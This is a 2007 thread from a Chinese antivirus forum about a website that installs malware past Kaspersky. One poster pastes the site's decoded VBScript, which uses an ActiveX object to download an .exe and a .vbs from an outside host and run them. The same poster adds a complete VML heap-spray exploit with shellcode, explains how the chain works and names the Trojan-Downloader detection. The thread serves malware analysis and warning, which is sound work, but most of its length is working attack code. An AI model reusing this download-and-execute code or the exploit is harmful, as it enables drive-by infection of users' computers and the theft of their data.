楼主: a5der
收起左侧

[已解决] 发现一个病毒网站能使卡巴的key失效,绕过卡巴,然后使电脑中毒

 关闭 [复制链接]
a5der
 楼主| 发表于 2007-4-12 11:32:15 | 显示全部楼层
原帖由 gooltall 于 2007-4-12 11:10 发表
mcafee呢?有人试过吗?

我这只有卡巴 ,哪位胆大的去看看?反正我是不去了,杀毒杀了好久
mds
发表于 2007-4-12 11:36:06 | 显示全部楼层

回复 #10 troika 的帖子

是不是修改系统时间的病毒啊?
新饭
发表于 2007-4-12 11:44:25 | 显示全部楼层
首先声明,本人是kis6.0.2.621,组策略禁止修改系统时间,主动防御只开行为和注册表,昨天中午的病毒库
结果没事,硬盘灯亮了一会,无任何提示(病毒库已经报了)

一进去会看到类似页面未找到的提示
查看源代码,看到最后部分
  1. <script language="javascript" src="js.asp?id=204853053&logo=1"></script>
复制代码
而js.asp?id=204853053&logo=1的内容包含转意的脚本,动态写入页面,转意后为
  1. <script language="VBScript>
  2.     on error resume next
  3.     Set df = document.createElement("object")
  4.     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  5.     str="Microsoft.XMLHTTP"
  6.     Set x = df.CreateObject(str,"")
  7.     a1="Ado"
  8.     a2="db."
  9.     a3="Str"
  10.     a4="eam"
  11.     str1=a1&a2&a3&a4
  12.     str5=str1
  13.     set S = df.createobject(str5,"")
  14.     S.type = 1
  15.     str6="GET"
  16.     x.Open str6, "http://www.17173-map.com/yycx/ahd41d.exe", False
  17.     x.Send
  18.     fsssname1="c:\\wing.exe"
  19.     set F = df.createobject("Scripting.FileSystemObject","")
  20.     set tmp = F.GetSpecialFolder(2)
  21.     S.open
  22.     S.write x.responseBody
  23.     S.savetofile fsssname1,2
  24.     S.close
  25.     set Q = df.createobject("Shell.Application","")
  26.     </script>
  27. <html>
  28. <script language="VBScript>
  29.     on error resume next
  30.     Set df = document.createElement("object")
  31.     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  32.     str="Microsoft.XMLHTTP"
  33.     Set x = df.CreateObject(str,"")
  34.     a1="Ado"
  35.     a2="db."
  36.     a3="Str"
  37.     a4="eam"
  38.     str1=a1&a2&a3&a4
  39.     str5=str1
  40.     set S = df.createobject(str5,"")
  41. if Not Err.Number = 0 then
  42. err.clear
  43. document.write ("<iframe src=704.html width=0 height=0 >")
  44. else
  45.     S.type = 1
  46.     str6="GET"
  47.     x.Open str6, "http://www.17173-map.com/hh/41/yt.vbs", False
  48.     x.Send
  49.     fsssname1="yt.vbs"
  50.     set F = df.createobject("Scripting.FileSystemObject","")
  51.     set tmp = F.GetSpecialFolder(2)
  52.     fsssname1= F.BuildPath(tmp,fsssname1)
  53.     S.open
  54.     S.write x.responseBody
  55.     S.savetofile fsssname1,2
  56.     S.close
  57.     set Q = df.createobject("Shell.Application","")
  58.     Q.ShellExecute fsssname1,"","","o"&"pen",0
  59. end if
  60.     </script>
  61.     <head>
  62.     <title></title>
  63.     </head>
  64. <body>
  65. <script src='http://s100.cnzz.com/stat.php?id=386636&web_id=386636&show=pic' language='JavaScript' charset='gb2312'></script>
  66. </body></html>
复制代码
分析代码看到
脚本先尝试把http://www.17173-map.com/yycx/ahd41d.exe下载到c:\wing.exe并尝试运行
然后调用704.html,失败的话直接下载运行http://www.17173-map.com/hh/41/yt.vbs
最后,又调用js脚本http://s100.cnzz.com/stat.php?id=386636&web_id=386636&show=pic

第一ahd41d.exe昨天病毒库扫不出,今天病毒库报Trojan-Downloader.Win32.Delf.bif
第二个http://www.17173-map.com/hh/41/yt.vbs脚本就是5秒运行一次第一步生成的文件c:\wing.exe
第三个是调用中国站长联盟cnzz.com的脚本拿你的cookie的一些信息以及你机器的一些外部信息发送到http://bsl41.com.cn,应该是木马主人的空间,这样既提高自己主页排名,又能得到受害者信息

至于那个703.htm,,又包含转意脚本,晕,转意完后一看,还是转意脚本,晕晕,看了半天看不懂,晕晕晕
贴来大家分析吧,我无能为力了
注,直接贴,返回页面会让卡巴认为是攻击,所以替换所有尖括号。

  1. 〈!--  vml'exploit!  --〉
  2. 〈html xmlns:v="urn:schemas-microsoft-com:vml"〉
  3. 〈head〉
  4. 〈object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"〉
  5. 〈/object〉
  6. 〈style〉
  7. v\:* { behavior: url(#VMLRender); }
  8. 〈/style〉
  9. 〈/head〉
  10. 〈body〉
  11. 〈script language="javascript"〉
  12. var shellcode = unescape("%u9090"+"%u9090"+
  13. "%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
  14. "%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
  15. "%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
  16. "%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
  17. "%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
  18. "%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
  19. "%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
  20. "%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
  21. "%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
  22. "%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
  23. "%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
  24. "%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
  25. "%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
  26. "%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
  27. "%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
  28. "%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
  29. "%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
  30. "%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
  31. "%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
  32. "%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
  33. "%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
  34. "%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
  35. "%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
  36. "%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
  37. "%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u3731%u3731" +
  38. "%u2d33%u616d%u2e70%u6f63%u2f6d%u7979%u7863%u612f" +
  39. "%u6468%u3134%u2e64%u7865%u0065");
  40. bigblock = unescape("%u0505%u0505");
  41. headersize = 20;
  42. slackspace = headersize+shellcode.length;
  43. while (bigblock.length〈slackspace) bigblock+=bigblock;
  44. fillblock = bigblock.substring(0, slackspace);
  45. block = bigblock.substring(0, bigblock.length-slackspace);
  46. while(block.length+slackspace〈0x40000) block = block+block+fillblock;
  47. memory = new Array();
  48. hh = memory;
  49. for (i=0;i〈350;i++) hh[i] = block + shellcode;
  50. 〈/script〉
  51. 〈v:rect style='width:120pt;height:80pt' fillcolor="red" 〉
  52. 〈v:recolorinfo recolorstate="t" numcolors="97612895"〉
  53. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  54. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  55. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  56. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  57. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  58. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  59. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  60. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  61. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  62. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  63. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  64. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  65. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  66. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  67. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  68. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  69. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  70. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  71. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  72. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  73. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  74. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  75. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  76. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  77. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  78. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  79. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  80. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  81. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  82. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  83. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  84. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  85. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  86. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  87. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  88. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  89. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  90. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  91. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  92. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  93. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  94. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  95. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  96. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  97. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  98. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  99. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  100. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  101. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  102. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  103. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  104. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  105. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  106. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  107. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  108. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  109. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  110. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  111. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  112. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  113. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  114. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  115. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  116. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  117. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  118. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  119. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  120. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  121. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  122. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  123. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  124. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  125. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  126. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  127. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  128. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  129. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  130. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  131. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  132. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  133. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  134. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  135. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  136. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  137. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  138. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  139. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  140. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  141. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  142. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  143. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  144. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  145. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  146. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  147. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  148. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  149. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  150. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  151. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  152. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  153. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  154. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  155. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  156. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  157. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  158. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  159. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  160. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  161. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  162. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  163. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  164. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  165. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  166. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  167. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  168. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  169. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  170. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  171. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  172. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  173. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  174. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  175. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  176. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  177. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  178. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  179. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  180. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  181. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  182. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  183. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  184. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  185. 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
  186. lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
  187. fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
  188. 〈v/recolorinfo〉
  189. 〈/html〉
复制代码

[ 本帖最后由 新饭 于 2007-4-13 11:26 编辑 ]
hzx123dlm
发表于 2007-4-12 11:47:19 | 显示全部楼层
太可怕了
耕耘
发表于 2007-4-12 11:48:23 | 显示全部楼层
用了307扫没检到什么~`
暗天使
发表于 2007-4-12 11:48:59 | 显示全部楼层
感谢提醒啊
a5der
 楼主| 发表于 2007-4-12 11:49:31 | 显示全部楼层
原帖由 新饭 于 2007-4-12 11:44 发表
找不到网页
您要查看的网页可能已被删除、名称已被更改,或者暂时不可用。

--------------------------------------------------------------------------------

请尝试以下操作:

如果您已经在地址 ...

是这样的,估计您已中刀了
newsswen
发表于 2007-4-12 11:54:44 | 显示全部楼层
原帖由 troika 于 2007-4-12 11:30 发表
我挖到本病毒了

是不是修改了系统时间,然后使Key失效的?
troika
发表于 2007-4-12 11:57:40 | 显示全部楼层
原帖由 newsswen 于 2007-4-12 11:54 发表

是不是修改了系统时间,然后使Key失效的?

没有修改时间
leafyoung
发表于 2007-4-12 12:02:18 | 显示全部楼层
呵呵,还是静观其变了,等高手接招了。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-24 20:25 , Processed in 0.166294 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表